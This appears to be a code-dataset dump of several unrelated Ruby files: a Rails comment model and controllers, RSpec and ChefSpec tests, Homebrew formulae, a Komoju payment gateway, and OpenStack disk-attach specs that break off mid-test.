hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
4a530e626abf69a8db45cd44a98fcf4986b913c4 | 791 | require 'travis/yml/helper/obj'
module Travis
module Yml
class Msgs
include Enumerable, Helper::Obj
attr_reader :msgs
def initialize
@msgs = []
end
def each(&block)
msgs.each(&block)
end
def to_a
msgs
end
def concat(other)
msgs.concat(other.to_a)
end
def messages
msgs.map do |level, key, code, args|
compact(
type: 'config',
level: level,
key: key,
code: code,
args: except(args, :src, :line),
src: args[:src],
line: args[:line]
)
end
end
def full_messages
msgs.map do |msg|
Yml.msg(msg)
end
end
end
end
end
| 16.479167 | 44 | 0.470291 |
26d704417de684d0913281b91c9368f39cdb4aac | 2,771 | require 'rails_helper'
require 'support/devise'
RSpec.describe ReportsController, type: :controller do
login_report
describe "GET #location" do
it "returns http success" do
get :location
expect(response).to have_http_status(:success)
end
describe "Variable Assignments, Display tree Ture " do
let(:location) {create(:location)}
before(:each) do
get :location , params: {id: location.to_param, order_to: true, expiries: true, display_tree: true}
end
it "assigns @order to to true" do
expect(assigns(:order_to)).to be_truthy
end
it "assigns expiries to be true" do
expect(assigns(:expiries)).to be_truthy
end
it "assigns @global to be false" do
expect(assigns(:global)).to be_falsey
end
it "assigns @location correctly" do
expect(assigns(:location)).to eq(location)
end
it "assigns @display_tree correctly" do
expect(assigns(:display_tree)).to be_truthy
end
it "assigns locations to be location subtree" do
expect(assigns(:location_tree)).to eq({location => {}})
end
end
describe "Variable Assignments, Display tree false " do
let(:location) {create(:location)}
before(:each) do
get :location , params: {id: location.to_param}
end
it "assigns @order to to false" do
expect(assigns(:order_to)).to be_falsey
end
it "assigns expiries to be false" do
expect(assigns(:expiries)).to be_falsey
end
it "assigns @global to be false" do
expect(assigns(:global)).to be_falsey
end
it "assigns @location correctly" do
expect(assigns(:location)).to eq(location)
end
it "assigns @display_tree correctly" do
expect(assigns(:display_tree)).to be_falsey
end
end
describe "Global Report variable assignments" do
before(:each) do
create(:stock_item)
create(:location)
get :location , params: {display_tree: true}
end
it "assigns @order to to false" do
expect(assigns(:order_to)).to be_falsey
end
it "assigns expiries to be false" do
expect(assigns(:expiries)).to be_falsey
end
it "assigns @global to be true" do
expect(assigns(:global)).to be_truthy
end
it "assigns @display_tree correctly" do
expect(assigns(:display_tree)).to be_truthy
end
it "assigns @stock_item_summaries to be summary"do
expect(assigns(:stock_item_summaries).first.stock_item).to eq(StockItem.first)
end
it "assigns locations to be global tree" do
expect(assigns(:location_tree)).to eq({Location.first => {}})
end
end
end
end
| 29.795699 | 107 | 0.635511 |
21f9f8df3b688b33fcf1383b17dddd439d2ee225 | 3,596 | class Comment < ActiveRecord::Base
belongs_to :commentable, :polymorphic => true
belongs_to :user
belongs_to :recipient, :class_name => "User", :foreign_key => "recipient_id"
validates_presence_of :comment
# validates_presence_of :recipient
validates_length_of :comment, :maximum => 2000
before_save :whitelist_attributes
validates_presence_of :user, :unless => Proc.new{|record| AppConfig.allow_anonymous_commenting }
validates_presence_of :author_email, :unless => Proc.new{|record| record.user } #require email unless logged in
validates_presence_of :author_ip, :unless => Proc.new{|record| record.user} #log ip unless logged in
validates_format_of :author_url, :with => /(^$)|(^(http|https):\/\/[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,5}(([0-9]{1,5})?\/.*)?$)/ix, :unless => Proc.new{|record| record.user }
acts_as_activity :user, :if => Proc.new{|record| record.user } #don't record an activity if there's no user
# named_scopes
named_scope :recent, :order => 'created_at DESC'
def self.find_photo_comments_for(user)
Comment.find(:all, :conditions => ["recipient_id = ? AND commentable_type = ?", user.id, 'Photo'], :order => 'created_at DESC')
end
# Helper class method to lookup all comments assigned
# to all commentable types for a given user.
def self.find_comments_by_user(user, *args)
options = args.extract_options!
find(:all,
:conditions => ["user_id = ?", user.id],
:order => "created_at DESC",
:limit => options[:limit]
)
end
def previous_commenters_to_notify
# only send a notification on recent comments
# limit the number of emails we'll send (or posting will be slooowww)
User.find(:all,
:conditions => ["users.id NOT IN (?) AND users.notify_comments = ?
AND commentable_id = ? AND commentable_type = ?
AND comments.created_at > ?", [user_id, recipient_id.to_i], true, commentable_id, commentable_type, 2.weeks.ago],
:include => :comments_as_author, :group => "users.id", :limit => 20)
end
def commentable_name
type = self.commentable_type.underscore
case type
when 'user'
commentable.login
when 'post'
commentable.title
when 'clipping'
commentable.description || "Clipping from #{commentable.user.login}"
when 'photo'
commentable.description || "Photo from #{commentable.user.login}"
else
commentable.class.to_s.humanize
end
end
def title_for_rss
"Comment from #{username}"
end
def username
user ? user.login : (author_name.blank? ? 'Anonymous' : author_name)
end
def self.find_recent(options = {:limit => 5})
find(:all, :conditions => "created_at > '#{14.days.ago.to_s :db}'", :order => "created_at DESC", :limit => options[:limit])
end
def can_be_deleted_by(person)
person && (person.admin? || person.id.eql?(user.id) || person.id.eql?(recipient.id) )
end
def should_notify_recipient?
return unless recipient
return false if recipient.eql?(user)
return false unless recipient.notify_comments?
true
end
def notify_previous_commenters
previous_commenters_to_notify.each do |commenter|
UserNotifier.deliver_follow_up_comment_notice(commenter, self)
end
end
def send_notifications
UserNotifier.deliver_comment_notice(self) if should_notify_recipient?
self.notify_previous_commenters
end
protected
def whitelist_attributes
self.comment = white_list(self.comment)
end
end
| 33.924528 | 180 | 0.672692 |
0195d0e1fbc6c542dc70d3d0ab65052d75688dea | 1,401 | module Application
class << self
def initialize!
load_entities
load_lib
load_models
load_helpers
load_restfuls_v1
load_routes
load_validations
load_comm
load_patch
load_api
end
private
def load_entities
Dir[File.expand_path('../entities/*.rb', __FILE__)].each {|entity| require entity }
end
def load_models
Dir[File.expand_path('../../models/*.rb', __FILE__)].each {|model| require model }
end
def load_helpers
Dir[File.expand_path('../helpers/*.rb', __FILE__)].each {|helper| require helper }
end
def load_routes
Dir[File.expand_path('../restfuls/*.rb', __FILE__)].each {|route| require route }
end
def load_restfuls_v1
Dir[File.expand_path('../restfuls/v1/*.rb', __FILE__)].each {|api| require api }
end
def load_lib
Dir[File.expand_path('../../../lib/base_user/*.rb', __FILE__)].each {|lib| require lib }
end
def load_validations
Dir[File.expand_path('../validations/*.rb', __FILE__)].each {|val| require val }
end
def load_comm
require File.expand_path('../comm', __FILE__)
end
def load_patch
require File.expand_path('../patch', __FILE__)
end
def load_api
require File.expand_path('../api', __FILE__)
end
end
end
# Initialize Application
Application.initialize!
| 21.890625 | 94 | 0.630978 |
61d39d113dc7b4ba132cb334888d9c3e669bcfe0 | 208 | module SparkApi
module Models
class PortalListingCart < ListingCart
def self.find(contact_id, *arguments)
@contact_id = contact_id
super(*arguments)
end
end
end
end
| 14.857143 | 43 | 0.649038 |
79ce1b6d36ebf8dcad1d59978972d06a61d6d963 | 2,013 | module Users
class BackupCodeSetupController < ApplicationController
include MfaSetupConcern
include RememberDeviceConcern
before_action :authenticate_user!
before_action :confirm_user_authenticated_for_2fa_setup
before_action :ensure_backup_codes_in_session, only: %i[continue download]
before_action :set_backup_code_setup_presenter
def index
@presenter = BackupCodeCreatePresenter.new
end
def depleted
@presenter = BackupCodeDepletedPresenter.new
end
def create
generate_codes
result = BackupCodeSetupForm.new(current_user).submit
analytics.track_event(Analytics::BACKUP_CODE_SETUP_VISIT, result.to_h)
analytics.track_event(Analytics::BACKUP_CODE_CREATED)
Funnel::Registration::AddMfa.call(current_user.id, 'backup_codes')
save_backup_codes
end
def edit; end
def continue
flash[:success] = t('notices.backup_codes_configured')
redirect_to two_2fa_setup
end
def download
data = user_session[:backup_codes].join("\r\n") + "\r\n"
send_data data, filename: 'backup_codes.txt'
end
private
def ensure_backup_codes_in_session
redirect_to backup_code_setup_url unless user_session[:backup_codes]
end
def generate_codes
@codes = generator.generate
user_session[:backup_codes] = @codes
end
def set_backup_code_setup_presenter
@presenter = SetupPresenter.new(current_user, user_fully_authenticated?)
end
def mark_user_as_fully_authenticated
user_session[TwoFactorAuthentication::NEED_AUTHENTICATION] = false
user_session[:authn_at] = Time.zone.now
end
def save_backup_codes
mark_user_as_fully_authenticated
generator.save(user_session[:backup_codes])
create_user_event(:backup_codes_added)
revoke_remember_device(current_user) unless user_session['signing_up']
end
def generator
@generator ||= BackupCodeGenerator.new(@current_user)
end
end
end
| 27.958333 | 78 | 0.740189 |
acbf681eabecd1e281ad14fde5e97bf8f234572c | 626 | cask "chrysalis" do
version "0.8.2"
sha256 "4008f87f49271bed6e27f3f7d359ce8537df179cad35dd8b0f6e56b4179b66e4"
url "https://github.com/keyboardio/Chrysalis/releases/download/v#{version}/Chrysalis-#{version}.dmg"
name "Chrysalis"
desc "Graphical configurator for Kaleidoscope-powered keyboards"
homepage "https://github.com/keyboardio/Chrysalis"
livecheck do
url :url
strategy :github_latest
regex(%r{href=.*?/Chrysalis-(\d+(?:\.\d+)*)\.dmg}i)
end
app "Chrysalis.app"
zap trash: [
"~/Library/Application Support/chrysalis",
"~/Library/Preferences/keyboardio.chrysalis.plist",
]
end
| 27.217391 | 102 | 0.722045 |
e286845ad35549f3884fcb1da14b097cdb1545c9 | 907 | require File.expand_path('../../../spec_helper', __FILE__)
describe "File.lchmod" do
platform_is_not :os => [:linux, :windows, :openbsd, :solaris] do
before :each do
@fname = tmp('file_chmod_test')
@lname = @fname + '.lnk'
touch(@fname) { |f| f.write "rubinius" }
rm_r @lname
File.symlink @fname, @lname
end
after :each do
rm_r @lname, @fname
end
it "changes the file mode of the link and not of the file" do
File.chmod(0222, @lname).should == 1
File.lchmod(0755, @lname).should == 1
File.lstat(@lname).executable?.should == true
File.lstat(@lname).readable?.should == true
File.lstat(@lname).writable?.should == true
File.stat(@lname).executable?.should == false
File.stat(@lname).readable?.should == false
File.stat(@lname).writable?.should == true
end
end
end
| 27.484848 | 66 | 0.596472 |
f717277e9b6918d1235a6025c43ab557939df5ba | 127 | class SettingsController < ApplicationController
layout "devise"
before_action :authenticate_user!
def index
end
end
| 14.111111 | 48 | 0.787402 |
e23276967a49b2b76c9ec83e7accbf86d8d1bc8d | 333 | module TestUnit
module Generators
class DecoratorGenerator < ::Rails::Generators::NamedBase
source_root File.expand_path('../templates', __FILE__)
def create_decorator_test
template 'decorator_test.rb', File.join('test/decorators', class_path, "#{file_name}_decorator_test.rb")
end
end
end
end
| 27.75 | 112 | 0.714715 |
e9f57f15dde25b7937306cd774671430555ded62 | 9,867 | require 'chef/formatters/base'
require 'chef/formatters/error_mapper'
module ChefSpec
class ChefFormatter < Chef::Formatters::Base
cli_name :chefspec
# Called at the very start of a Chef Run
def run_start(version); end
def run_started(run_status); end
# Called at the end a successful Chef run.
def run_completed(node); end
# Called at the end of a failed Chef run.
def run_failed(exception); end
# Called right after ohai runs.
def ohai_completed(node); end
# Already have a client key, assuming this node has registered.
def skipping_registration(node_name, config); end
# About to attempt to register as +node_name+
def registration_start(node_name, config); end
def registration_completed; end
# Failed to register this client with the server.
def registration_failed(node_name, exception, config)
expecting_exception(exception) do
description = Chef::Formatters::ErrorMapper.registration_failed(node_name, exception, config)
display_error(description)
end
end
# Called before Chef client loads the node data from the server
def node_load_start(node_name, config); end
# Failed to load node data from the server
def node_load_failed(node_name, exception, config)
expecting_exception(exception) do
description = Chef::Formatters::ErrorMapper.node_load_failed(node_name, exception, config)
display_error(description)
end
end
# Error expanding the run list
def run_list_expand_failed(node, exception)
expecting_exception(exception) do
description = Chef::Formatters::ErrorMapper.run_list_expand_failed(node, exception)
display_error(description)
end
end
# Called after Chef client has loaded the node data.
# Default and override attrs from roles have been computed, but not yet applied.
# Normal attrs from JSON have been added to the node.
def node_load_completed(node, expanded_run_list, config); end
# Called before the cookbook collection is fetched from the server.
def cookbook_resolution_start(expanded_run_list); end
# Called when there is an error getting the cookbook collection from the
# server.
def cookbook_resolution_failed(expanded_run_list, exception)
expecting_exception(exception) do
description = Chef::Formatters::ErrorMapper.cookbook_resolution_failed(expanded_run_list, exception)
display_error(description)
end
end
# Called when the cookbook collection is returned from the server.
def cookbook_resolution_complete(cookbook_collection); end
# Called before unneeded cookbooks are removed
def cookbook_clean_start; end
# Called after the file at +path+ is removed. It may be removed if the
# cookbook containing it was removed from the run list, or if the file was
# removed from the cookbook.
def removed_cookbook_file(path); end
# Called when cookbook cleaning is finished.
def cookbook_clean_complete; end
# Called before cookbook sync starts
def cookbook_sync_start(cookbook_count); end
# Called when cookbook +cookbook_name+ has been sync'd
def synchronized_cookbook(cookbook_name); end
# Called when an individual file in a cookbook has been updated
def updated_cookbook_file(cookbook_name, path); end
# Called when an error occurs during cookbook sync
def cookbook_sync_failed(cookbooks, exception)
expecting_exception(exception) do
description = Chef::Formatters::ErrorMapper.cookbook_sync_failed(cookbooks, exception)
display_error(description)
end
end
# Called after all cookbooks have been sync'd.
def cookbook_sync_complete; end
# Called when library file loading starts
def library_load_start(file_count); end
# Called when library file has been loaded
def library_file_loaded(path); end
# Called when a library file has an error on load.
def library_file_load_failed(path, exception)
file_load_failed(path, exception)
end
# Called when library file loading has finished
def library_load_complete; end
# Called when LWRP loading starts
def lwrp_load_start(lwrp_file_count); end
# Called after a LWR or LWP has been loaded
def lwrp_file_loaded(path); end
# Called after a LWR or LWP file errors on load
def lwrp_file_load_failed(path, exception)
file_load_failed(path, exception)
end
# Called when LWRPs are finished loading
def lwrp_load_complete; end
# Called when an ohai plugin file loading starts
def ohai_plugin_load_start(file_count); end
# Called when an ohai plugin file has been loaded
def ohai_plugin_file_loaded(path); end
# Called when an ohai plugin file has an error on load.
def ohai_plugin_file_load_failed(path, exception); end
# Called when an ohai plugin file loading has finished
def ohai_plugin_load_complete; end
# Called before attribute files are loaded
def attribute_load_start(attribute_file_count); end
# Called after the attribute file is loaded
def attribute_file_loaded(path); end
# Called when an attribute file fails to load.
def attribute_file_load_failed(path, exception)
file_load_failed(path, exception)
end
# Called when attribute file loading is finished
def attribute_load_complete; end
# Called before resource definitions are loaded
def definition_load_start(definition_file_count); end
# Called when a resource definition has been loaded
def definition_file_loaded(path); end
# Called when a resource definition file fails to load
def definition_file_load_failed(path, exception)
file_load_failed(path, exception)
end
# Called when resource defintions are done loading
def definition_load_complete; end
# Called before recipes are loaded
def recipe_load_start(recipe_count); end
# Called after the recipe has been loaded
def recipe_file_loaded(path); end
# Called after a recipe file fails to load
def recipe_file_load_failed(path, exception)
file_load_failed(path, exception)
end
# Called when a recipe cannot be resolved
def recipe_not_found(exception)
expecting_exception(exception) do
description = Chef::Formatters::ErrorMapper.file_load_failed(nil, exception)
display_error(description)
end
end
# Called when recipes have been loaded.
def recipe_load_complete; end
# Called before convergence starts
def converge_start(run_context); end
# Called when the converge phase is finished.
def converge_complete; end
# Called before action is executed on a resource.
def resource_action_start(resource, action, notification_type=nil, notifier=nil); end
# Called when a resource fails, but will retry.
def resource_failed_retriable(resource, action, retry_count, exception); end
# Called when a resource fails and will not be retried.
def resource_failed(resource, action, exception)
expecting_exception(exception) do
description = Chef::Formatters::ErrorMapper.resource_failed(resource, action, exception)
display_error(description)
end
end
# Called when a resource action has been skipped b/c of a conditional
def resource_skipped(resource, action, conditional); end
# Called when a resource action has been completed
def resource_completed(resource); end
# Called after #load_current_resource has run.
def resource_current_state_loaded(resource, action, current_resource); end
# Called when resource current state load is skipped due to the provider
# not supporting whyrun mode.
def resource_current_state_load_bypassed(resource, action, current_resource); end
# Called when evaluating a resource that does not support whyrun in whyrun mode
def resource_bypassed(resource, action, current_resource); end
# Called when a resource has no converge actions, e.g., it was already correct.
def resource_up_to_date(resource, action); end
# Called when a change has been made to a resource. May be called multiple
# times per resource, e.g., a file may have its content updated, and then
# its permissions updated.
def resource_update_applied(resource, action, update); end
# Called after a resource has been completely converged, but only if
# modifications were made.
def resource_updated(resource, action); end
# Called before handlers run
def handlers_start(handler_count); end
# Called after an individual handler has run
def handler_executed(handler); end
# Called after all handlers have executed
def handlers_completed; end
# Called when an assertion declared by a provider fails
def provider_requirement_failed(action, resource, exception, message); end
# Called when a provider makes an assumption after a failed assertion
# in whyrun mode, in order to allow execution to continue
def whyrun_assumption(action, resource, message); end
# An uncategorized message. This supports the case that a user needs to
# pass output that doesn't fit into one of the callbacks above. Note that
# there's no semantic information about the content or importance of the
# message. That means that if you're using this too often, you should add a
# callback for it.
def msg(message); end
private
def file_load_failed(path, exception)
expecting_exception(exception) do
description = Chef::Formatters::ErrorMapper.file_load_failed(path, exception)
display_error(description)
end
end
def expecting_exception(exception, &block)
yield unless ChefSpec::ExpectException.new(exception).expected?
end
end
end
| 34.865724 | 108 | 0.736495 |
b92a9b1ca85dd58b3c876369291a93efde435921 | 90 | class StaticController < ApplicationController
skip_before_filter :ensure_signed_in
end
| 22.5 | 46 | 0.877778 |
1a52dc2d2df8f63593d076a0461027236a054cb8 | 1,332 | class Gocryptfs < Formula
desc "Encrypted overlay filesystem written in Go"
homepage "https://nuetzlich.net/gocryptfs/"
url "https://github.com/rfjakob/gocryptfs/releases/download/v1.8.0/gocryptfs_v1.8.0_src-deps.tar.gz"
sha256 "c4ca576c2a47f0ed395b96f70fb58fc8f7b4beced8ae67e356eeed6898f8352a"
license "MIT"
bottle do
sha256 cellar: :any, catalina: "adf2a34cc99f353992e790c856971e9128d55caf5c51a2ae0a50ff5506e63c1c"
sha256 cellar: :any, mojave: "3e4cd09514efbd074f41f6636f0df0b01708856446c1da1d6cfe766cd8cae121"
sha256 cellar: :any, high_sierra: "a7e6b3d28c3e3cd78ff4be78adc8d2feeb8061c7459d2c8e6f04e61f0029bb51"
end
depends_on "go" => :build
depends_on "pkg-config" => :build
depends_on "[email protected]"
on_macos do
disable! date: "2021-04-08", because: "requires FUSE"
end
on_linux do
depends_on "libfuse"
end
def install
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/rfjakob/gocryptfs").install buildpath.children
cd "src/github.com/rfjakob/gocryptfs" do
system "./build.bash"
bin.install "gocryptfs"
prefix.install_metafiles
end
end
test do
(testpath/"encdir").mkpath
pipe_output("#{bin}/gocryptfs -init #{testpath}/encdir", "password", 0)
assert_predicate testpath/"encdir/gocryptfs.conf", :exist?
end
end
| 31.714286 | 104 | 0.738739 |
62b9fb77e6b001512b182f4bc8eb1e490b401336 | 430 | package "yum-s3-iam" do
version node['yum_s3_iam']['version']
end
template File.join('/', 'etc', 'yum.repos.d', "#{node['yum_s3_iam']['repo_name']}.repo") do
owner 'root'
group 'root'
mode '0644'
source 's3-iam.repo.erb'
variables :repo_name => node['yum_s3_iam']['repo_name'],
:repo_description => node['yum_s3_iam']['repo_description'],
:repo_bucket => node['yum_s3_iam']['repo_bucket']
end
| 30.714286 | 91 | 0.639535 |
1d80aec337e185b986fe26ea77e68884ff079c7d | 618 | require 'thor'
require 'fxpotato'
require 'date'
require 'fxpotato/cli_formatter'
module FxPotato
class CLI < Thor
desc "getrate BASE TARGET", "Gets the foreign exchange rate for the given currencies on the chosen date."
method_option :date, :aliases => "-d", :desc => "A specific date to get the rate for, e.g. -d 2017-05-29. Defaults to today."
def getrate(base, target)
date = options[:date] || Date.today
begin
fxrate = FxPotato.at(base, target, date)
puts CLIFormatter.result(fxrate)
rescue RuntimeError => message
puts message
end
end
end
end
| 29.428571 | 129 | 0.666667 |
b9500cb27f2dbdb71b0ceb6e2bd6e2517b0d4909 | 835 | #!/usr/bin/env ruby
#
# Put description here
#
#
#
#
#
require 'swig_assert'
require 'using_composition'
include Using_composition
f = FooBar.new
if f.blah(3) != 3
raise RuntimeError,"FooBar::blah(int)"
end
if f.blah(3.5) != 3.5
raise RuntimeError,"FooBar::blah(double)"
end
if f.blah("hello") != "hello"
raise RuntimeError,"FooBar::blah(char *)"
end
f = FooBar2.new
if f.blah(3) != 3
raise RuntimeError,"FooBar2::blah(int)"
end
if f.blah(3.5) != 3.5
raise RuntimeError,"FooBar2::blah(double)"
end
if f.blah("hello") != "hello"
raise RuntimeError,"FooBar2::blah(char *)"
end
f = FooBar3.new
if f.blah(3) != 3
raise RuntimeError,"FooBar3::blah(int)"
end
if f.blah(3.5) != 3.5
raise RuntimeError,"FooBar3::blah(double)"
end
if f.blah("hello") != "hello"
raise RuntimeError,"FooBar3::blah(char *)"
end
| 14.649123 | 44 | 0.664671 |
5d95228a99c84aa264b0962ac336d0afcb6b8e66 | 1,389 | class TreeBuilderReportSavedReports < TreeBuilderReportReportsClass
private
def tree_init_options(_tree_name)
{
:full_ids => true,
:leaf => 'MiqReportResult'
}
end
def set_locals_for_render
locals = super
locals.merge!(:autoload => true)
end
def root_options
{
:text => t = _("All Saved Reports"),
:tooltip => t
}
end
# Get root nodes count/array for explorer tree
def x_get_tree_roots(_count_only, _options)
u = User.current_user
user_groups = u.report_admin_user? ? nil : u.miq_groups
having_report_results(user_groups).pluck(:name, :id).sort.map do |name, id|
{:id => id.to_i.to_s, :text => name, :icon => 'fa fa-file-text-o', :tip => name}
end
end
def x_get_tree_custom_kids(object, count_only, _options)
scope = MiqReportResult.with_current_user_groups_and_report(object[:id].split('-').last)
count_only ? 1 : scope.order("last_run_on DESC").includes(:miq_task).to_a
end
# Scope on reports that have report results.
def having_report_results(miq_groups)
miq_group_relation = MiqReport.joins(:miq_report_results).distinct
if miq_groups.nil? # u.report_admin_user?
miq_group_relation.where.not(:miq_report_results => {:miq_group_id => nil})
else
miq_group_relation.where(:miq_report_results => {:miq_group_id => miq_groups})
end
end
end
| 29.553191 | 92 | 0.691145 |
abb745f19b87bd58cbd48fd3755dce892ef5c0c9 | 651 | require 'spec_helper'
describe 'gnocchi::client' do
shared_examples_for 'gnocchi client' do
it { is_expected.to contain_class('gnocchi::params') }
it 'installs gnocchi client package' do
is_expected.to contain_package('python-gnocchiclient').with(
:ensure => 'present',
:name => 'python-gnocchiclient',
:tag => 'openstack',
)
end
end
on_supported_os({
:supported_os => OSDefaults.get_supported_os
}).each do |os,facts|
context "on #{os}" do
let (:facts) do
facts.merge!(OSDefaults.get_facts())
end
it_behaves_like 'gnocchi client'
end
end
end
| 21 | 66 | 0.631336 |
bf71fadd2cf64035d48b69bef66b4a10e0065d69 | 127 | class AddChoicesToQuestions < ActiveRecord::Migration[5.2]
def change
add_column :questions, :choices, :string
end
end
| 21.166667 | 58 | 0.755906 |
f8b8ad08e01034a8d2e0c554a7d441887fb21708 | 323 | # frozen_string_literal: true
class CreateAnimals < ActiveRecord::Migration[5.2]
def change
create_table :animals do |t|
t.string :name
t.string :gender
t.date :birthdate_rescuedate
t.boolean :rescued
t.boolean :adopted
t.date :adoption_date
t.timestamps
end
end
end
| 19 | 50 | 0.662539 |
ac0aa2a9a99d612a13732369c8fb9df41b2e0db5 | 418 | module CourseExports
class PrepareJob < ApplicationJob
include Loggable
queue_as :low_priority
def perform(course_export)
# Prepare the export.
CourseExports::PrepareService.new(course_export).execute
# Notify the user who requested the export.
unless course_export.user.email_bounced?
CourseExportMailer.prepared(course_export).deliver_now
end
end
end
end
| 23.222222 | 62 | 0.727273 |
d53ab5f5165bfc68d28c494552bdffb1717f642d | 3,649 | require 'json'
module ActiveMerchant #:nodoc:
module Billing #:nodoc:
class KomojuGateway < Gateway
self.test_url = 'https://komoju.com/api/v1'
self.live_url = 'https://komoju.com/api/v1'
self.supported_countries = ['JP']
self.default_currency = 'JPY'
self.money_format = :cents
self.homepage_url = 'https://www.komoju.com/'
self.display_name = 'Komoju'
self.supported_cardtypes = [:visa, :master, :american_express, :jcb]
STANDARD_ERROR_CODE_MAPPING = {
'bad_verification_value' => 'incorrect_cvc',
'card_expired' => 'expired_card',
'card_declined' => 'card_declined',
'invalid_number' => 'invalid_number'
}
def initialize(options = {})
requires!(options, :login)
super
end
def purchase(money, payment, options = {})
post = {}
post[:amount] = amount(money)
post[:description] = options[:description]
add_payment_details(post, payment, options)
post[:currency] = options[:currency] || default_currency
post[:external_order_num] = options[:order_id] if options[:order_id]
post[:tax] = options[:tax] if options[:tax]
add_fraud_details(post, options)
commit('/payments', post)
end
def refund(money, identification, options = {})
commit("/payments/#{identification}/refund", {})
end
private
def add_payment_details(post, payment, options)
details = {}
details[:type] = 'credit_card'
details[:number] = payment.number
details[:month] = payment.month
details[:year] = payment.year
details[:verification_value] = payment.verification_value
details[:given_name] = payment.first_name
details[:family_name] = payment.last_name
details[:email] = options[:email] if options[:email]
post[:payment_details] = details
end
def add_fraud_details(post, options)
details = {}
details[:customer_ip] = options[:ip] if options[:ip]
details[:customer_email] = options[:email] if options[:email]
details[:browser_language] = options[:browser_language] if options[:browser_language]
details[:browser_user_agent] = options[:browser_user_agent] if options[:browser_user_agent]
post[:fraud_details] = details unless details.empty?
end
def api_request(path, data)
raw_response = nil
begin
raw_response = ssl_post("#{url}#{path}", data, headers)
rescue ResponseError => e
raw_response = e.response.body
end
JSON.parse(raw_response)
end
def commit(path, params)
response = api_request(path, params.to_json)
success = !response.key?('error')
message = (success ? 'Transaction succeeded' : response['error']['message'])
Response.new(
success,
message,
response,
test: test?,
error_code: (success ? nil : error_code(response['error']['code'])),
authorization: (success ? response['id'] : nil)
)
end
def error_code(code)
STANDARD_ERROR_CODE_MAPPING[code] || code
end
def url
test? ? self.test_url : self.live_url
end
def headers
{
'Authorization' => 'Basic ' + Base64.encode64(@options[:login].to_s + ':').strip,
'Accept' => 'application/json',
'Content-Type' => 'application/json',
'User-Agent' => "Komoju/v1 ActiveMerchantBindings/#{ActiveMerchant::VERSION}"
}
end
end
end
end
| 31.456897 | 99 | 0.605097 |
386c977be37182d0e31da296e74338c4ca59bf2f | 6,460 | # Copyright (c) 2009-2013 VMware, Inc.
# Copyright (c) 2012 Piston Cloud Computing, Inc.
require 'spec_helper'
describe Bosh::OpenStackCloud::Cloud do
let(:server) { double('server', :id => 'i-test', :name => 'i-test', :flavor => { 'id' => 'f-test'} ) }
let(:volume) { double('volume', :id => 'v-foobar') }
let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 10, :swap => '') }
let(:cloud) do
mock_cloud(cloud_options['properties']) do |openstack|
expect(openstack.servers).to receive(:get).with('i-test').and_return(server)
expect(openstack.volumes).to receive(:get).with('v-foobar').and_return(volume)
expect(openstack.flavors).to receive(:find).and_return(flavor)
end
end
let(:cloud_options) { mock_cloud_options }
before(:each) do
@registry = mock_registry
end
it 'attaches an OpenStack volume to a server' do
volume_attachments = []
attachment = double('attachment', :device => '/dev/sdc')
expect(server).to receive(:volume_attachments).and_return(volume_attachments)
expect(volume).to receive(:attach).with(server.id, '/dev/sdc').and_return(attachment)
expect(cloud).to receive(:wait_resource).with(volume, :'in-use')
old_settings = { 'foo' => 'bar'}
new_settings = {
'foo' => 'bar',
'disks' => {
'persistent' => {
'v-foobar' => '/dev/sdc'
}
}
}
expect(@registry).to receive(:read_settings).with('i-test').and_return(old_settings)
expect(@registry).to receive(:update_settings).with('i-test', new_settings)
cloud.attach_disk('i-test', 'v-foobar')
end
it 'picks available device name' do
volume_attachments = [{'volumeId' => 'v-c', 'device' => '/dev/vdc'},
{'volumeId' => 'v-d', 'device' => '/dev/xvdd'}]
attachment = double('attachment', :device => '/dev/sdd')
expect(server).to receive(:volume_attachments).and_return(volume_attachments)
expect(volume).to receive(:attach).with(server.id, '/dev/sde').and_return(attachment)
expect(cloud).to receive(:wait_resource).with(volume, :'in-use')
old_settings = { 'foo' => 'bar'}
new_settings = {
'foo' => 'bar',
'disks' => {
'persistent' => {
'v-foobar' => '/dev/sde'
}
}
}
expect(@registry).to receive(:read_settings).with('i-test').and_return(old_settings)
expect(@registry).to receive(:update_settings).with('i-test', new_settings)
cloud.attach_disk('i-test', 'v-foobar')
end
it 'raises an error when sdc..sdz are all reserved' do
volume_attachments = ('c'..'z').inject([]) do |array, char|
array << {'volumeId' => "v-#{char}", 'device' => "/dev/sd#{char}"}
array
end
expect(server).to receive(:volume_attachments).and_return(volume_attachments)
expect {
cloud.attach_disk('i-test', 'v-foobar')
}.to raise_error(Bosh::Clouds::CloudError, /too many disks attached/)
end
it 'bypasses the attaching process when volume is already attached to a server' do
volume_attachments = [{'volumeId' => 'v-foobar', 'device' => '/dev/sdc'}]
attachment = double('attachment', :device => '/dev/sdd')
cloud = mock_cloud do |openstack|
expect(openstack.servers).to receive(:get).with('i-test').and_return(server)
expect(openstack.volumes).to receive(:get).with('v-foobar').and_return(volume)
end
expect(server).to receive(:volume_attachments).and_return(volume_attachments)
expect(volume).not_to receive(:attach)
old_settings = { 'foo' => 'bar'}
new_settings = {
'foo' => 'bar',
'disks' => {
'persistent' => {
'v-foobar' => '/dev/sdc'
}
}
}
expect(@registry).to receive(:read_settings).with('i-test').and_return(old_settings)
expect(@registry).to receive(:update_settings).with('i-test', new_settings)
cloud.attach_disk('i-test', 'v-foobar')
end
context 'first device name letter' do
before do
allow(server).to receive(:volume_attachments).and_return([])
allow(cloud).to receive(:wait_resource)
allow(cloud).to receive(:update_agent_settings)
end
subject(:attach_disk) { cloud.attach_disk('i-test', 'v-foobar') }
let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 0, :swap => '') }
context 'when there is no ephemeral, swap disk and config drive' do
it 'return letter b' do
expect(volume).to receive(:attach).with(server.id, '/dev/sdb')
attach_disk
end
end
context 'when there is ephemeral disk' do
let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 1024, :swap => '') }
it 'return letter c' do
expect(volume).to receive(:attach).with(server.id, '/dev/sdc')
attach_disk
end
end
context 'when there is swap disk' do
let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 0, :swap => 200) }
it 'return letter c' do
expect(volume).to receive(:attach).with(server.id, '/dev/sdc')
attach_disk
end
end
context 'when config_drive is set as disk' do
let(:cloud_options) do
cloud_options = mock_cloud_options
cloud_options['properties']['openstack']['config_drive'] = 'disk'
cloud_options
end
